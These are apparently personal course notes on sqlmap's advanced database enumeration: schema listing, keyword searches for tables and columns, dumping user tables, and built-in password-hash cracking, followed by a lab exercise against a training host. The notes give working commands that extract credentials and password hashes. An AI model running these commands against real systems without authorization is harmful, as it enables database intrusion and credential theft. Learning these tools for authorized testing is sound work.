7 - Advanced DB Enum

# DB Schema Enum - If we wanted to retrieve the structure of all of the tables so that we can have a complete overview of the database architecture, we could use the switch `--schema` ```bash sqlmap -u "http://www.example.com/?id=1" --schema ``` # Searching for Data - When dealing with complex database structures with numerous tables and columns, we can search for databases, tables, and columns of interest, by using the `--search` option ```bash #search for table names with keyword "user" sqlmap -u "http://www.example.com/?id=1" --search -T user #search for column names with keyword "pass" sqlmap -u "http://www.example.com/?id=1" --search -C pass ``` # Password Enumeration and Cracking - Once we identify a table containing passwords (e.g. `master.users`), we can retrieve that table with the `-T` option - SQLMap has automatic password hashes cracking capabilities - Upon retrieving any value that resembles a known hash format, SQLMap prompts us to perform a dictionary-based attack on the found hashes - Currently, there is an implemented support for cracking 31 different types of hash algorithms, with an included dictionary containing 1.4 million entries (compiled over the years with most common entries appearing in publicly available password leaks) ```bash sqlmap -u "http://www.example.com/?id=1" --dump -D master -T users ``` - Apart from user credentials found in DB tables, we can also attempt to dump the content of system tables containing database-specific credentials (e.g., connection credentials) - To ease the whole process, SQLMap has a special switch `--passwords` designed especially for such a task ```bash sqlmap -u "http://www.example.com/?id=1" --passwords --batch # --all switch combined with the --batch switch, will automatically do the whole enumeration process on the target itself, and provide the enum details ``` # Exercise # Case 1 - Fine name of column containing "style" in it's name ```bash sqlmap -u "http://94.237.121.111:33358/case1.php?id=1" --search -C style ``` ![[images/Pasted image 20251209182229.png]] - Find Kimberley's password - Enum the schema - Found testdb.users with "password" column ```bash sqlmap -u "http://94.237.121.111:33358/case1.php?id=1" --schema ``` ![[images/Pasted image 20251209182620.png]] - Perform similar enum with `--search -C pass` ```bash sqlmap -u "http://94.237.121.111:33358/case1.php?id=1" --search -C password ``` ![[images/Pasted image 20251209182734.png]] - Dump testdb.users - Enable auto cracking when prompted ```bash sqlmap -u "http://94.237.121.111:33358/case1.php?id=1" --dump -T users -D testdb ``` ![[images/Pasted image 20251209183037.png]]